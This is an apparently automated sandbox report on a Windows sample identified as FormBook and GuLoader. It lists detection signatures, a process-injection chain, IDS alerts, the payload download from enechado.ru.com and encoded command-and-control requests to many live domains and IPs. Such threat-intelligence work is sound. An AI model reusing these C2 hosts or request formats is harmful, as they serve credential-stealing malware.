Windows Analysis Report
ZAMOWIEN.BAT.exe

Overview

General Information

Sample name: ZAMOWIEN.BAT.exe
Analysis ID: 1562240
MD5: 936fd06cf63ed725bdb6bc4c83bed228
SHA1: ce4ec27a6a48dd8be5879bbdaf90cc3bda91a3a5
SHA256: c41569f8bec1ed93da1978dbf2d97005a7db32ccb9d526ee17a6c7027fc6fc8c

Detection

Detected families: FormBook, GuLoader
Score: 96
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Suricata IDS alerts for network traffic
Yara detected FormBook
Yara detected GuLoader
Found direct / indirect Syscall (likely to bypass EDR)
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64native
  • ZAMOWIEN.BAT.exe (PID: 8000 cmdline: "C:\Users\user\Desktop\ZAMOWIEN.BAT.exe" MD5: 936FD06CF63ED725BDB6BC4C83BED228)
    • ZAMOWIEN.BAT.exe (PID: 4604 cmdline: "C:\Users\user\Desktop\ZAMOWIEN.BAT.exe" MD5: 936FD06CF63ED725BDB6BC4C83BED228)
      • RAVCpl64.exe (PID: 7484 cmdline: "C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe" -s MD5: 731FB4B2E5AFBCADAABB80D642E056AC)
        • sdchange.exe (PID: 7976 cmdline: "C:\Windows\SysWOW64\sdchange.exe" MD5: 8E93B557363D8400A8B9F2D70AEB222B)
          • firefox.exe (PID: 5620 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: FA9F4FC5D7ECAB5A20BF7A9D1251C851)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000004.00000002.36984586192.00000000042B0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000002.00000002.33603243074.0000000037400000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000004.00000002.36984512971.0000000004260000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000000.00000002.33323827525.000000000825E000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security |

No Sigma rule has matched


          AV Detection

          Source: Yara matchFile source: 00000004.00000002.36984586192.00000000042B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.33603243074.0000000037400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.36984512971.0000000004260000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: ZAMOWIEN.BAT.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: ZAMOWIEN.BAT.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: sdchange.pdbGCTL source: ZAMOWIEN.BAT.exe, 00000002.00000003.33540855304.00000000076AA000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: mshtml.pdb source: ZAMOWIEN.BAT.exe, 00000002.00000001.33319853756.0000000000649000.00000020.00000001.01000000.00000008.sdmp
          Source: Binary string: wntdll.pdbUGP source: ZAMOWIEN.BAT.exe, 00000002.00000003.33487623850.00000000374F0000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: ZAMOWIEN.BAT.exe, ZAMOWIEN.BAT.exe, 00000002.00000003.33487623850.00000000374F0000.00000004.00000020.00020000.00000000.sdmp, sdchange.exe
          Source: Binary string: mshtml.pdbUGP source: ZAMOWIEN.BAT.exe, 00000002.00000001.33319853756.0000000000649000.00000020.00000001.01000000.00000008.sdmp
          Source: Binary string: sdchange.pdb source: ZAMOWIEN.BAT.exe, 00000002.00000003.33540855304.00000000076AA000.00000004.00000020.00020000.00000000.sdmp
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 0_2_004065C7 FindFirstFileW,FindClose,0_2_004065C7
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 0_2_00405996 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405996
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 0_2_00402868 FindFirstFileW,0_2_00402868
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 4x nop then mov ebx, 00000004h2_2_373D04EF
          Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 4x nop then mov ebx, 00000004h3_2_0068F4EF
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4x nop then mov ebx, 00000004h4_2_047404EF

          Networking

          Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49758 -> 208.91.197.27:80
          Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49750 -> 13.248.169.48:80
          Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49742 -> 195.110.124.133:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49772 -> 66.29.149.46:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49743 -> 172.67.145.234:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49748 -> 13.248.169.48:80
          Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49754 -> 31.31.196.177:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49744 -> 172.67.145.234:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49765 -> 154.88.22.105:80
          Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49766 -> 154.88.22.105:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49769 -> 43.155.76.124:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49752 -> 31.31.196.177:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49745 -> 172.67.145.234:80
          Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49774 -> 66.29.149.46:80
          Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49786 -> 45.81.23.25:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49764 -> 154.88.22.105:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49763 -> 154.88.22.105:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49747 -> 13.248.169.48:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49784 -> 45.81.23.25:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49767 -> 43.155.76.124:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49751 -> 31.31.196.177:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49771 -> 66.29.149.46:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49792 -> 172.67.145.234:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49775 -> 81.88.58.216:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49773 -> 66.29.149.46:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49802 -> 31.31.196.177:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49753 -> 31.31.196.177:80
          Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49790 -> 13.248.169.48:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49783 -> 45.81.23.25:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49803 -> 31.31.196.177:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49780 -> 104.21.27.59:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49779 -> 104.21.27.59:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49785 -> 45.81.23.25:80
          Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49817 -> 154.88.22.105:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49794 -> 172.67.145.234:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49796 -> 13.248.169.48:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49811 -> 8.210.46.21:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49804 -> 31.31.196.177:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49816 -> 154.88.22.105:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49760 -> 8.210.46.21:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49820 -> 43.155.76.124:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49759 -> 8.210.46.21:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49761 -> 8.210.46.21:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49768 -> 43.155.76.124:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49776 -> 81.88.58.216:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49787 -> 13.248.169.48:80
          Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49762 -> 8.210.46.21:80
          Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49821 -> 43.155.76.124:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49781 -> 104.21.27.59:80
          Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49791 -> 195.110.124.133:80
          Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49795 -> 172.67.145.234:80
          Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49746 -> 172.67.145.234:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49777 -> 81.88.58.216:80
          Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49778 -> 81.88.58.216:80
          Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49805 -> 31.31.196.177:80
          Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49782 -> 104.21.27.59:80
          Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49770 -> 43.155.76.124:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49793 -> 172.67.145.234:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49788 -> 13.248.169.48:80
          Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49799 -> 13.248.169.48:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49815 -> 154.88.22.105:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49797 -> 13.248.169.48:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49819 -> 43.155.76.124:80
          Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49813 -> 8.210.46.21:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49810 -> 8.210.46.21:80
          Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49809 -> 208.91.197.27:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49814 -> 154.88.22.105:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49818 -> 43.155.76.124:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49812 -> 8.210.46.21:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49806 -> 208.91.197.27:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49749 -> 13.248.169.48:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49807 -> 208.91.197.27:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49808 -> 208.91.197.27:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49756 -> 208.91.197.27:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49755 -> 208.91.197.27:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49789 -> 13.248.169.48:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49798 -> 13.248.169.48:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49757 -> 208.91.197.27:80
          Source: DNS query: www.tals.xyz
          Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
          Source: Joe Sandbox ViewIP Address: 103.83.194.50 103.83.194.50
          Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
          Source: Joe Sandbox ViewASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC
          Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49741 -> 103.83.194.50:80
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
          Source: global traffic HTTP traffic detected: GET /pol.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: enechado.ru.com Cache-Control: no-cache
          Source: global traffic HTTP traffic detected: GET /vlg0/?ZQ=9w6eOuayM&2WLcH=qomJeF/TtZ0QUZ/lu9bWw6fKKq403Qj3n7TxRqREffWgONqaapTJsxm8a+ti36YSjfwaEcz7GfWHOzY8D/KxmBZDEE3LvMzzAWoLAjA157mklULIe55/Q78= HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Host: www.officinadelpasso.shop Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
          Source: global traffic HTTP traffic detected: GET /4twy/?2WLcH=mBCElVLkK93E7Nf+Sf/fyHG4g+iIHO2SyRrruRXkg+zqtIWho1c/UJ5ICRtgbVPxo7eZFunASSkRDpjuJtL+E+17mAmUYSpmNLkEhz/yhl+/g4aluoCzA3U=&ZQ=9w6eOuayM HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Host: www.vayui.top Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
          Source: global traffic HTTP traffic detected: GET /tj5o/?ZQ=9w6eOuayM&2WLcH=MhGDhTK4KRmGDwnOvV5WTz4iIRJmk2m8IatiCmUJgqSFlXJgrRiMUM9JCqLDwZv9mOpEe9GWmALCKqKQahiZVY7y7ZV5P9kCtZ0hNHTZPf+sBxGPFSp4opc= HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Host: www.tals.xyz Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
          Source: global traffic HTTP traffic detected: GET /sr6d/?2WLcH=1SpMEcLzJ9Sn7Ad5q3DkRiZVN2jVBq+dlMgZT/nq/UyfSDPywFazxbh+/qzvL+EnIyZaTvIKZcPRrxMSWCBfdTtLgScf+bZOQub9cvrYC+7J/tJ5pDuOaT0=&ZQ=9w6eOuayM HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Host: www.nartex-uf.online Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
          Source: global traffic HTTP traffic detected: GET /ftvk/?2WLcH=GExPV6KtXOXigkukfMfleD4xRaYqvrj5rkn1yqQr0MAVEMidlCaC83oYsDNl6Uf72gZXo4lyCEReg4R57wnVyD0gHtEFldueDrd90mwd3SDfs8vpytBw7tE=&ZQ=9w6eOuayM HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Host: www.614genetics.online Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
          Source: global traffic HTTP traffic detected: GET /r45a/?2WLcH=VI7arJMCR+F5a8GIF7LvlydvT54UqGGGJzEBbUfyg8Id9FJQQiiIP0Zhv5D8EvYCLyQ71yr7yDtQnd5dLG0ZmCq3JeeWBBH/ELG6XL/ZgjHL6FvdoncqEJc=&ZQ=9w6eOuayM HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Host: www.prhmcjdz.tokyo Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
          Source: global traffic HTTP traffic detected: GET /sp9i/?2WLcH=/yY+7m1AZbgb0K2/LwtBLxCjXaU0b9j5Pi53FyGdgcs4UrSukFrrBxiVM6k9vqLarsWUeALRJhCd8Ws3EraXiGfQePxT8U++C5GowWJeifl9yaVeP5ongLY=&ZQ=9w6eOuayM HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Host: www.cg19g5.pro Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
          Source: global traffic HTTP traffic detected: GET /gzx8/?2WLcH=zakk0Z6QX+PeMKuO9doP3TuSH4tsROWjUg+AcMIBC3jNAdeJcFpvchgVbxSCnVd2G7blpBbqDXciYyMV8Uav3uCQEiSaobLJsegQ2xqoFvZbzlxviNb8bJg=&ZQ=9w6eOuayM HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Host: www.nuy25c9t.sbs Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
          Source: global traffic HTTP traffic detected: GET /rb2m/?2WLcH=Dszlqgj74cWUzrw4FgoVa9SEyJwv0S7kouPjlT8bGIWxA2GhpIId8RbI+3ekZHN60cH9zamMOD41tV9XrOGIH+Ivz1i08chkDZaL4252rRmFu2Eqz92NoWw=&ZQ=9w6eOuayM HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Host: www.golivenow.live Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
          Source: global traffic HTTP traffic detected: GET /2muc/?2WLcH=BGEoK7nai7wQrj2aEM2P8qfkzKtqrNNfgf6S4Ju7MMLh1Bc/IyqyqzXdBYzJKfwOd0JT6GOuPVdJb0BzGYwvQg/AACFP7fG4nxHnnQpuCqy2cfx3+fFWSZg=&ZQ=9w6eOuayM HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Host: www.kanadeviainova.net Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
          Source: global traffic HTTP traffic detected: GET /zet9/?2WLcH=moLtZ3Q2YS5/hkjwzodJ1swdKZQozUlOYqvt2cuq7Yvv9xGOVSWf5GjI0u28lvuJt3GCOLDggiamVwDKnOFVInrpmEPV2qsYzTve7f9TvzKyqWkrNPKErR0=&ZQ=9w6eOuayM HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Host: www.mydreamdeal.click Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
          Source: global traffic HTTP traffic detected: GET /ij3v/?2WLcH=Z1ob5t14nDPacJC0EUrCTzBKiEN+xlFbGZTgiBJJl0QL8NgJJ8ECyZW/F0sl+HO9WEhrMzz4zoZTxRA1IM3jizzPUf5s72Oblbx3ef6zp59TnsaC/1UaQJc=&ZQ=9w6eOuayM HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Host: www.aquax.cloud Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
          Source: global traffic HTTP traffic detected: GET /h7t0/?2WLcH=6TLewr8yhertJGkqH+FQWeFrQNLAh3ybhDcYvQV/Hdp8NbM7L1MKR/llezyAaDw0ekOxFhGBkmvPnBSy2dX3PczRZMZfTyd1n8zEZdYU3+dh/YokLdnKa7I=&ZQ=9w6eOuayM HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Host: www.108.foundation Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
          Source: global traffic DNS traffic detected: DNS query: enechado.ru.com
          Source: global traffic DNS traffic detected: DNS query: www.officinadelpasso.shop
          Source: global traffic DNS traffic detected: DNS query: www.vayui.top
          Source: global traffic DNS traffic detected: DNS query: www.tals.xyz
          Source: global traffic DNS traffic detected: DNS query: www.nartex-uf.online
          Source: global traffic DNS traffic detected: DNS query: www.newtoppornx1.buzz
          Source: global traffic DNS traffic detected: DNS query: www.614genetics.online
          Source: global traffic DNS traffic detected: DNS query: www.prhmcjdz.tokyo
          Source: global traffic DNS traffic detected: DNS query: www.cg19g5.pro
          Source: global traffic DNS traffic detected: DNS query: www.nuy25c9t.sbs
          Source: global traffic DNS traffic detected: DNS query: www.golivenow.live
          Source: global traffic DNS traffic detected: DNS query: www.kanadeviainova.net
          Source: global traffic DNS traffic detected: DNS query: www.mydreamdeal.click
          Source: global traffic DNS traffic detected: DNS query: www.aquax.cloud
          Source: global traffic DNS traffic detected: DNS query: www.75178.club
          Source: global traffic DNS traffic detected: DNS query: www.108.foundation
          Source: global traffic DNS traffic detected: DNS query: www.bagazone.online
